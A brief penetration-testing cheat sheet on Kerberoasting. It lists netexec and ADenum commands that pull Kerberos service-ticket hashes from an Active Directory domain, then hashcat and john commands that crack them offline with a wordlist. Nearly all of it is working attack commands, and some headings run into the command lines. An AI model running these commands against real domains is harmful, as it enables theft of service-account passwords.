Kerberoasting
1.0 Enumeration
1.1 netexec
netexec ldap $ip -u username -p password --kerberoasting users.khash1.2 adenum
# ADenum: https://github.com/SecuProject/ADenum
adenum -d $domain.local -ip $dcip -u $user -p $pass -c2.0 Cracking
2.1 hashcat
hashcat -m 13100 --force -a 0 users.khash /path/to/word.list2.2 john
john --format=krb5tgs --wordlist=/path/to/word.list users.khash